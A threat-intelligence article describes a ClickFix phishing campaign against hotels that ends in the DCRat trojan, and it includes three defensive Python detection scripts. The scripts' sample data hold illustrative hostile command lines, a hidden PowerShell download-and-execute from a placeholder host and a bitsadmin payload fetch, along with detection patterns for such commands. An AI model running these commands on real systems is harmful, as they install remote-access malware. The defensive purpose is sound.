
PHALT#BLYX: Fake BSOD Phishing That Puts Hotels at Risk

Cybercriminals are no longer relying on noisy exploits or obvious malware attachments. Instead, they are weaponizing social engineering, urgency, and users’ instinct to “fix” technical problems themselves.

A newly identified phishing campaign dubbed PHALT#BLYX illustrates this shift perfectly. The campaign targets hotels and hospitality businesses across Europe, particularly during the busy holiday season, when staff are under pressure and booking‑related emails are common.

The attack combines:

  • Fake Booking.com cancellation notices
  • An advanced ClickFix social‑engineering technique
  • Abuse of legitimate Windows tools (“Living off the Land”)
  • And deployment of the DCRat remote access trojan

The result is a multi‑stage, highly evasive intrusion chain. The email carries only a link, so attachment scanning has nothing to inspect, and the first stage on the host is a command the user types in and a project file run by a Microsoft‑signed tool, which is why the chain often passes traditional email security and endpoint defenses.


What Is PHALT#BLYX?

PHALT#BLYX is not a simple phishing campaign. Instead of convincing victims to open a malicious attachment, it tricks them into manually executing malware themselves, believing they are resolving a system error.

At the center of the campaign is a fake Windows Blue Screen of Death (BSOD) displayed inside a web browser. This visual deception creates panic and urgency, pushing users to follow on‑screen “repair” instructions without questioning them.

The attackers’ objectives include:

  • Gaining persistent remote access to hotel systems
  • Stealing credentials and sensitive booking information
  • Maintaining long‑term access via DCRat for further abuse

Attack Chain Overview: A Multi‑Stage “Living off the Land” Operation

Stage 1: Phishing Emails Masquerading as Booking.com Alerts

The attack begins with phishing emails impersonating Booking.com reservation cancellations.

Common characteristics include:

  • References to unexpected or inflated charges in euros
  • Urgent language suggesting financial impact
  • A prominent “See details” button

These emails are particularly effective against hospitality staff who deal with booking platforms daily.


Stage 2: Redirect to a Convincing Booking.com Clone

Clicking the button redirects the victim through:

oncameraworkout[.]com/ksbo

to the phishing domain:

low-house[.]com

The website is a near‑perfect visual clone of Booking.com, making it difficult for non‑technical users to detect the fraud.

After a short delay, the page displays a “loading” error and presents a Refresh button.


Stage 3: ClickFix Technique and Fake BSOD

When the victim clicks Refresh, the website triggers the core deception:

  • A fake Windows Blue Screen of Death appears in the browser
  • The user is instructed to “fix” the problem by:
    1. Pressing Windows + R
    2. Pasting a command already copied to the clipboard
    3. Executing it via the Run dialog

This technique, known as ClickFix, has the victim execute a malicious PowerShell command by hand. The page copies the command to the clipboard (typically on the Refresh click, since browsers only allow clipboard writes in response to a user gesture); nothing is downloaded through the browser, so the mail gateway and web proxy see only an ordinary web page, and the first process in the chain is launched from explorer.exe exactly as any user‑typed Run command would be. It sidesteps many automated controls for that reason, but it leaves its own trace: the Run dialog records each entry under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU.
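The RunMRU trace is the quickest host‑side check for a ClickFix interaction. The following triage script is an added example written for this article, not Securonix's tooling or anything from the campaign: it parses a `reg export` of the RunMRU key (each entry is stored as a REG_SZ `<command>\1`, ordered by the MRUList value) and flags entries that look like a pasted loader. The registry export embedded below is constructed; the PowerShell line in it is illustrative rather than the campaign's real command, and `example.invalid` is a reserved, non‑routable name.

```python
import re

# Constructed sample of `reg export HKCU\...\Explorer\RunMRU` output after a
# ClickFix-style Win+R interaction. The PowerShell entry is illustrative only.
SAMPLE_RUNMRU_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU]
"MRUList"="cab"
"a"="notepad\\1"
"b"="\\\\fileserver\\scans\\1"
"c"="powershell -w hidden -ep bypass -c \"iwr hxxp://example.invalid/v.proj -OutFile $env:TEMP\\v.proj\"\\1"
'''

# Indicators that a Run-dialog entry looks like a pasted ClickFix payload.
SUSPICIOUS = [
    (r"\b(powershell|pwsh)\b", "PowerShell host"),
    (r"\b(mshta|msbuild|wscript|cscript|rundll32)\b", "script/LOLBin host"),
    (r"-w(indowstyle)?\s+hidden", "hidden window"),
    (r"-e(xecutionpolicy|p)\s+bypass", "execution-policy bypass"),
    (r"\b(iex|invoke-expression|iwr|invoke-webrequest|downloadstring|start-bitstransfer)\b",
     "download-and-execute cmdlet"),
    (r"\b(?:https?|hxxps?)://", "URL in command"),
]


def _unescape_reg(value: str) -> str:
    """Undo .reg escaping (doubled backslashes and backslash-escaped quotes)."""
    return re.sub(r'\\(["\\])', r"\1", value)


def parse_runmru(reg_text: str) -> list[str]:
    """Return Run-dialog history from a .reg export, most recent first.

    Each entry is a REG_SZ "<command>\\1"; the MRUList value gives the order.
    """
    entries: dict[str, str] = {}
    order = ""
    for line in reg_text.splitlines():
        m = re.match(r'^"([^"]+)"="(.*)"$', line)
        if not m:
            continue
        name, raw = m.groups()
        value = _unescape_reg(raw)
        if name == "MRUList":
            order = value
        else:
            entries[name] = value[:-2] if value.endswith("\\1") else value
    return [entries[k] for k in order if k in entries]


def triage_runmru(reg_text: str) -> list[dict]:
    """Flag history entries that match any ClickFix indicator."""
    findings = []
    for position, command in enumerate(parse_runmru(reg_text)):
        hits = [label for pattern, label in SUSPICIOUS if re.search(pattern, command, re.I)]
        if hits:
            findings.append({"position": position, "command": command, "indicators": hits})
    return findings


if __name__ == "__main__":
    for f in triage_runmru(SAMPLE_RUNMRU_EXPORT):
        print(f"[{f['position']}] {f['command']}\n    -> {', '.join(f['indicators'])}")
```

On a real host, export the key with `reg export "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" runmru.reg` and pass the file contents to `triage_runmru`; `reg export` writes UTF‑16, so open the file with `encoding="utf-16"`. Position 0 is the most recent entry, which is what matters when the user reports "the page told me to press Windows+R".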


Stage 4: PowerShell and MSBuild Abuse

The hidden PowerShell command fetches an MSBuild project file named:

v.proj

from:

2fa-bns[.]com

The file is executed with MSBuild.exe, a legitimate Microsoft‑signed build tool. An MSBuild project file can contain an inline task whose C# is compiled and run when the project is built, so the .proj acts as both loader and payload: the malicious logic arrives as text rather than as a compiled binary.

This is a classic Living‑off‑the‑Land (LotL) tactic:

  • No custom loader binary is dropped in the first stage
  • No malware binary has to pass signature or reputation checks at this point, because the executing process is Microsoft's own
  • Execution blends into normal system activity

Because the process image is signed and trusted, file‑reputation and signature‑based controls rate this behaviour low‑risk; only rules on the parent/child chain (explorer.exe → powershell.exe → MSBuild.exe) and on the command line distinguish it from a developer build.
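What separates this chain from a legitimate build is the process lineage and the paths on the command line, not the binaries involved. The detection logic below is an added example for this article, not a Securonix rule or the vendor's telemetry: it runs three rules over constructed process‑creation records (Sysmon Event ID 1 / Security 4688 style) and escalates any hit whose ancestor was already flagged, so the Win+R → PowerShell → MSBuild → BITS sequence surfaces as one high‑severity chain while a developer build of the same MSBuild.exe stays quiet. PIDs, paths, the user name and the commands in the sample events are illustrative (`example.invalid` is reserved and non‑routable), and the exact way the project file spawns its downloader is an assumption of the sample, not something the article establishes.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """One process-creation record (Sysmon Event ID 1 / Security 4688 style)."""
    pid: int
    ppid: int
    image: str
    parent_image: str
    cmdline: str


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
MSBUILD = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe"

# Constructed sample telemetry: PIDs, paths and commands are illustrative only.
EVENTS = [
    ProcEvent(4100, 900, r"C:\Windows\explorer.exe", r"C:\Windows\System32\userinit.exe", "explorer.exe"),
    # Win+R runs the pasted command with explorer.exe as the parent.
    ProcEvent(5210, 4100, PS, r"C:\Windows\explorer.exe",
              'powershell -w hidden -ep bypass -c "iwr hxxp://example.invalid/v.proj -OutFile $env:TEMP\\v.proj; '
              '& $env:windir\\Microsoft.NET\\Framework64\\v4.0.30319\\MSBuild.exe $env:TEMP\\v.proj"'),
    ProcEvent(5377, 5210, MSBUILD, PS, r"MSBuild.exe C:\Users\frontdesk\AppData\Local\Temp\v.proj"),
    # Assumed for the sample: the project file's task shells out to bitsadmin for the payload.
    ProcEvent(6001, 5377, r"C:\Windows\System32\bitsadmin.exe", MSBUILD,
              r"bitsadmin /transfer upd /download /priority normal "
              r"hxxp://example.invalid/staxs.exe C:\Users\frontdesk\AppData\Local\Temp\staxs.exe"),
    # Benign developer build: same binary, legitimate parent, source tree path.
    ProcEvent(7000, 6800, MSBUILD,
              r"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe",
              r"MSBuild.exe C:\src\pms\pms.csproj /t:Build"),
]

DEV_PARENTS = {"devenv.exe", "msbuild.exe", "dotnet.exe", "nuget.exe", "vbcscompiler.exe"}
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Downloads|Public|ProgramData)\\", re.I)
URL = re.compile(r"(?:https?|hxxps?)://\S+", re.I)


def _name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def rule_clickfix_powershell(ev: ProcEvent):
    """PowerShell spawned by explorer.exe (Run dialog / Start menu) with loader-style flags."""
    if _name(ev.image) not in {"powershell.exe", "pwsh.exe"} or _name(ev.parent_image) != "explorer.exe":
        return None
    flags = [label for pat, label in (
        (r"-w(indowstyle)?\s+hidden", "hidden window"),
        (r"-e(xecutionpolicy|p)\s+bypass", "execution-policy bypass"),
        (r"\b(iex|invoke-expression|iwr|invoke-webrequest|downloadstring)\b", "download/exec cmdlet"),
        (URL.pattern, "URL"),
    ) if re.search(pat, ev.cmdline, re.I)]
    return f"Run-dialog PowerShell: {', '.join(flags)}" if flags else None


def rule_msbuild_lolbin(ev: ProcEvent):
    """MSBuild outside a build tool chain, or building a project from a user-writable path."""
    if _name(ev.image) != "msbuild.exe":
        return None
    proj = re.search(r"\S+\.(?:proj|csproj|vbproj)\b", ev.cmdline, re.I)
    target = proj.group(0) if proj else "<no project on command line>"
    if _name(ev.parent_image) in DEV_PARENTS and not USER_WRITABLE.search(target):
        return None
    return f"MSBuild launched by {_name(ev.parent_image)} on {target}"


def rule_bits_download(ev: ProcEvent):
    """BITS used to fetch a payload from a URL."""
    cl = ev.cmdline.lower()
    if not (("bitsadmin" in cl and "/transfer" in cl) or "start-bitstransfer" in cl):
        return None
    m = URL.search(ev.cmdline)
    return f"BITS download from {m.group(0) if m else '<no url>'}"


RULES = (rule_clickfix_powershell, rule_msbuild_lolbin, rule_bits_download)


def _ancestors(pid: int, parent_of: dict) -> set:
    seen = set()
    while pid in parent_of and parent_of[pid] not in seen:
        pid = parent_of[pid]
        seen.add(pid)
    return seen


def detect(events: list) -> list:
    """Run every rule over every event; escalate hits whose ancestor is also a hit."""
    parent_of = {e.pid: e.ppid for e in events}
    alerts = [{"pid": e.pid, "rule": r.__name__, "detail": d, "severity": "medium"}
              for e in events for r in RULES if (d := r(e))]
    flagged = {a["pid"] for a in alerts}
    for a in alerts:
        if flagged & _ancestors(a["pid"], parent_of):
            a["severity"] = "high"  # child of an already-suspicious process: a chain, not a one-off
    return alerts


if __name__ == "__main__":
    for a in detect(EVENTS):
        print(f"{a['severity'].upper():6} pid={a['pid']} {a['rule']}: {a['detail']}")
```

The first PowerShell hit stays at medium on its own (a user launching a one‑liner from the Run dialog is unusual but not proof), and it is the MSBuild and BITS children that turn the sequence into a high‑severity chain. In production the same three rules map directly onto Sysmon's ParentImage/CommandLine fields; the lineage join is what keeps the developer‑workstation false positives down.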


Disabling Defenses and Establishing Persistence

Once executed, the malicious project file performs several actions:

Windows Defender Manipulation

It adds Defender exclusions for:

  • .exe
  • .ps1
  • .proj

so that the staged payload and the project file itself are not scanned. Adding exclusions requires administrator rights, so on a standard‑user account this step fails until the escalation below succeeds; each change is recorded in the Microsoft‑Windows‑Windows Defender/Operational log as Event ID 5007, which makes it a good alert in its own right.

The malware then attempts privilege escalation.

If Administrator Rights Are Obtained

  • Windows Defender real‑time protection is disabled
  • Additional defensive layers are weakened
  • The environment is prepared for payload delivery

Payload Delivery via BITS

The malware downloads:

staxs.exe

using the Background Intelligent Transfer Service (BITS), another trusted Windows component commonly abused by attackers. The transfer runs under the BITS service rather than the caller, survives reboots, and appears in proxy logs with the Microsoft BITS user agent instead of PowerShell's. The job is also recorded in the Microsoft‑Windows‑Bits‑Client/Operational event log, so it is a detection point as well as an evasion.


Unusual Persistence Mechanism

Instead of registry Run keys or scheduled tasks, the malware creates:

  • A URL shortcut (.url file) in the Startup folder

Windows launches every item in the Startup folder at user logon, so the payload runs each time the user signs in (not only after a reboot). A .url file is a small INI‑format text file whose URL= line can point at a local executable, so it draws less attention than an .lnk or a Run‑key entry, yet it is trivial to audit: both Startup locations (%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup and %ProgramData%\Microsoft\Windows\Start Menu\Programs\StartUp) can be listed and each URL= target checked.
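The audit described above, as an added example for this article (not Securonix's tooling and not the campaign's actual shortcut): it parses each .url file as the INI document it is, reads the URL= target and reports anything that is not a plain web bookmark, such as a file: URL, a bare drive path, an executable extension, or a target under a user‑writable directory. The three sample files are constructed; `read_startup_folders` reads the two real Startup locations when run on Windows and returns nothing elsewhere.

```python
import configparser
import os
from typing import Optional
from urllib.parse import unquote, urlparse

# The two Startup folders Windows processes at logon (per-user and all-users).
STARTUP_DIRS = (
    os.path.join(os.environ.get("APPDATA", ""), r"Microsoft\Windows\Start Menu\Programs\Startup"),
    os.path.join(os.environ.get("ProgramData", ""), r"Microsoft\Windows\Start Menu\Programs\StartUp"),
)
EXEC_EXT = {".exe", ".dll", ".ps1", ".bat", ".cmd", ".vbs", ".vbe", ".js", ".jse", ".hta", ".scr", ".msi"}
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\downloads\\", "\\programdata\\", "\\users\\public\\")

# Constructed sample .url files; the malicious one is illustrative, not the campaign's real shortcut.
SAMPLE_FILES = {
    "Intranet.url": "[InternetShortcut]\nURL=https://intranet.example/\nIconIndex=0\n",
    "Update.url": "[InternetShortcut]\nURL=file:///C:/Users/frontdesk/AppData/Roaming/staxs.exe\nIconIndex=0\n",
    "Notes.url": "not a shortcut at all\n",
}


def shortcut_target(content: str) -> Optional[str]:
    """Return the URL= value of an Internet Shortcut, or None if the file is not one."""
    cp = configparser.ConfigParser(interpolation=None)
    try:
        cp.read_string(content)
    except configparser.Error:
        return None
    return cp.get("InternetShortcut", "URL", fallback=None)


def assess_target(target: str) -> list[str]:
    """Reasons a Startup shortcut target looks like a persistence hook rather than a bookmark."""
    reasons = []
    u = urlparse(target)
    scheme = u.scheme.lower()
    if len(scheme) == 1:                      # "C:\..." parses as scheme "c": a bare drive path
        scheme, local = "file", target
    elif scheme == "file":
        local = unquote(u.path).lstrip("/")   # file:///C:/x -> C:/x
    elif scheme in ("http", "https"):
        local = unquote(u.path)
    else:
        local = target
    if scheme not in ("http", "https"):
        reasons.append(f"non-web scheme '{scheme or 'none'}'")
    local = local.replace("/", "\\").lower()
    ext = os.path.splitext(local)[1]
    if ext in EXEC_EXT:
        reasons.append(f"executable target {ext}")
    if any(d in "\\" + local for d in USER_WRITABLE):
        reasons.append("target in user-writable directory")
    return reasons


def audit_shortcuts(files: dict[str, str]) -> list[dict]:
    """Flag every .url whose target is suspicious or whose content is not a valid shortcut."""
    findings = []
    for name, content in files.items():
        if not name.lower().endswith(".url"):
            continue
        target = shortcut_target(content)
        reasons = assess_target(target) if target else ["malformed .url file"]
        if reasons:
            findings.append({"file": name, "target": target, "reasons": reasons})
    return findings


def read_startup_folders() -> dict[str, str]:
    """Load every .url in the real Startup folders (empty on non-Windows hosts)."""
    files = {}
    for d in STARTUP_DIRS:
        if not os.path.isdir(d):
            continue
        for entry in os.scandir(d):
            if entry.is_file() and entry.name.lower().endswith(".url"):
                with open(entry.path, encoding="utf-8", errors="replace") as fh:
                    files[entry.path] = fh.read()
    return files


if __name__ == "__main__":
    for f in audit_shortcuts(read_startup_folders() or SAMPLE_FILES):
        print(f"{f['file']}: {f['target']} -> {'; '.join(f['reasons'])}")
```

A legitimate Startup bookmark points at an http(s) page; anything that resolves to a local executable, and especially one under %APPDATA% or %TEMP%, is worth pulling for analysis. The same check can be folded into a scheduled integrity job that diffs the Startup folders against a known‑good baseline.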


Final Stage: DCRat Remote Access Trojan

The final payload is DCRat, a powerful remote access trojan of Russian origin.

Key Technical Capabilities

  • AES‑256 encryption
  • Configuration protection using PBKDF2
  • Code injection into aspnet_compiler.exe for stealth
  • Communication over TCP port 3535

Observed Command‑and‑Control Servers

  • asj77[.]com
  • asj88[.]com
  • asj99[.]com

What Attackers Can Do with DCRat

Once connected, DCRat enables operators to:

  • Perform keylogging
  • Access a remote shell
  • Capture screenshots
  • Upload or download files
  • Deploy additional payloads (including coin miners)
  • Maintain long‑term surveillance

This transforms infected systems into fully controllable remote assets.


Attribution and Campaign Evolution

Researchers at Securonix identified:

  • Cyrillic debug strings within the malware
  • Structural similarities to AsyncRAT
  • Indicators suggesting Russian‑speaking developers

Notably, this campaign represents an evolution:

  • Earlier variants relied on HTA‑based execution
  • PHALT#BLYX now uses MSBuild‑driven execution, increasing stealth and persistence

Why This Campaign Is Especially Dangerous

PHALT#BLYX highlights several modern threat trends:

  • Users execute the first stage themselves, so no exploit or attachment is needed
  • Only legitimate, signed Windows tools are used until the final payload
  • Fewer disk artifacts than a dropped binary, although the Run dialog history, PowerShell script block logs, the BITS client log and Defender's configuration‑change events still record the chain
  • High success rate through psychological pressure

Defensive technologies alone are insufficient if users can be coerced into bypassing them.


Recommended Defensive Measures

Technical Monitoring and Detection

  • Enable PowerShell script block logging (Event ID 4104) and module logging, so the pasted command and whatever it fetches are captured
  • Monitor MSBuild.exe execution outside development environments, especially when its parent is powershell.exe, cmd.exe, wscript.exe or mshta.exe
  • Alert on .proj files written to, or built from, user‑writable locations such as %TEMP% and %APPDATA%
  • Inspect both Startup folders (per‑user and all‑users) for unexpected .url shortcuts
  • Alert on Defender exclusion changes (Event ID 5007) and on BITS jobs that download executables

User Awareness and Training

  • Educate staff about ClickFix techniques
  • Warn against instructions to “repair” systems via web pages
  • Establish clear escalation procedures for suspicious emails

Zero Trust and Hardening

  • Enforce least‑privilege access
  • Restrict PowerShell and MSBuild usage where possible: AppLocker or WDAC rules can block MSBuild.exe for non‑developer users (it is on Microsoft's recommended block list), and PowerShell Constrained Language Mode limits what a pasted one‑liner can do
  • Apply application allow‑listing so that staged binaries such as staxs.exe cannot run from user‑writable paths
  • Separate booking systems from core infrastructure

Conclusion: Social Engineering Beats Exploits

PHALT#BLYX demonstrates a key reality of modern cyber threats:

The most effective attacks don’t break systems—they manipulate people.

By combining:

  • Convincing visuals
  • Trusted tools
  • And human psychology

Attackers can bypass even well‑configured defenses.

For hospitality organizations—where speed, customer service, and seasonal pressure are constant—the risk is particularly high. Effective defense requires technology, processes, and people to work together.
